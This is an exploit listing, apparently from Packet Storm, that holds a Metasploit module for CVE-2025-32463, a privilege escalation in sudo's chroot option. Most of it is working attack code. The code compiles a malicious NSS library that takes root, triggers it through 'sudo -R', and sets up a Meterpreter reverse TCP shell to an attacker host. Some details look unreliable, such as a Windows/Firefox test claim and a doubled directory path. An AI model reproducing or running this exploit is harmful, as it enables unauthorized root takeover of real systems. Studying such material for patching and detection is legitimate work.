Share
## https://sploitus.com/exploit?id=PACKETSTORM:215998
=============================================================================================================================================
| # Title : sudo 1.9.17 Sudo Chroot Privilege Escalation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.sudo.ws/ |
=============================================================================================================================================
[+] Summary :
This Metasploit module exploits CVE-2025-32463, a local privilege escalation vulnerability in Sudo's chroot functionality.
The vulnerability allows attackers to load malicious NSS (Name Service Switch) modules from within a chroot environment, leading to arbitrary code execution as root.
[+] Integration Methods :
1. **Standalone Exploit Module**
- Custom Ruby module for direct exploitation
- Automated chroot environment setup
- Payload execution as root
2. **Payload Integration**
- Modified NSS module with Meterpreter payload
- Reverse TCP connection establishment
- Root-level Meterpreter session
3. **Multi-Handler Approach**
- External exploit triggering Meterpreter
- Payload delivery via HTTP/SMB
- Session management through handler
[+] Module Components :
**Core Functions:**
- `check()`: Verifies sudo chroot capability
- `exploit()`: Main exploitation routine
- `generate_nss_module()`: Creates malicious NSS library
- `compile_nss_module()`: Compiles shared object
**Exploitation Flow:**
1. Vulnerability verification
2. Chroot environment creation
3. Malicious NSS module generation
4. Payload integration
5. Privilege escalation trigger
6. Meterpreter session establishment
[+] Usage :
use exploit/linux/local/sudo_chroot_priv_esc
set SESSION 1
set LHOST 192.168.1.100
set LPORT 4444
exploit
or
save as : sudo_chroot_exploit.rb
use exploit/multi/handler
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
exploit -j
[+] POC :
##
# Module for CVE-2025-32463 Sudo Chroot Privilege Escalation
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Sudo Chroot NSS Privilege Escalation (CVE-2025-32463)',
'Description' => %q{
This module exploits CVE-2025-32463, a privilege escalation vulnerability
in sudo's chroot functionality that allows loading malicious NSS modules.
},
'License' => MSF_LICENSE,
'Author' => ['indoushka'],
'References' => [
['CVE', '2025-32463']
],
'Platform' => ['linux'],
'Arch' => [ARCH_X64, ARCH_X86],
'SessionTypes' => ['shell', 'meterpreter'],
'Targets' => [['Automatic', {}]],
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
'PrependSetuid' => true
},
'DisclosureDate' => '2025-11-26',
'DefaultTarget' => 0
))
register_options([
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
])
end
def check
if command_exists?('sudo')
check_cmd = 'sudo -n -l | grep -i chroot'
result = cmd_exec(check_cmd)
if result =~ /chroot/
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
else
return Exploit::CheckCode::Safe
end
end
def exploit
working_dir = "#{datastore['WritableDir']}/.chroot_exploit"
cmd_exec("mkdir -p #{working_dir}/#{working_dir}/{lib,etc,bin}")
nss_payload = generate_nss_module
nsswitch_conf = "passwd: Xfiles\ngroup: files\nshadow: files\n"
write_file("#{working_dir}/etc/nsswitch.conf", nsswitch_conf)
if compile_nss_module(working_dir, nss_payload)
print_status("Malicious NSS module compiled successfully")
print_status("Triggering privilege escalation...")
cmd_exec("sudo -R #{working_dir} /bin/id")
whoami = cmd_exec('whoami')
if whoami =~ /root/
print_good("Successfully obtained root privileges!")
print_status("Executing payload as root...")
cmd_exec("/bin/bash -c \"#{payload.encoded}\"")
else
print_error("Privilege escalation failed")
end
else
print_error("Failed to compile NSS module")
end
cmd_exec("rm -rf #{working_dir}")
end
def generate_nss_module
payload_file = "/tmp/.msf_payload"
write_file(payload_file, payload.encoded)
cmd_exec("chmod +x #{payload_file}")
nss_code = %Q{
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <nss.h>
#include <pwd.h>
__attribute__((constructor)) void init() {
unsetenv("LD_PRELOAD");
setuid(0);
setgid(0);
system("#{payload_file} &");
system("rm -f #{payload_file}");
}
enum nss_status _nss_Xfiles_getpwnam_r(const char *name, struct passwd *pwd,
char *buf, size_t buflen, int *errnop) {
return NSS_STATUS_NOTFOUND;
}
}
return nss_code
end
def compile_nss_module(working_dir, source_code)
source_file = "#{working_dir}/payload.c"
output_file = "#{working_dir}/lib/libnss_Xfiles.so.2"
write_file(source_file, source_code)
compile_cmd = "gcc -fPIC -shared -o #{output_file} #{source_file} -nostartfiles"
result = cmd_exec(compile_cmd)
# Cleanup source
cmd_exec("rm -f #{source_file}")
return file_exist?(output_file)
end
def command_exists?(cmd)
result = cmd_exec("which #{cmd}")
return result.include?('/')
end
end
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================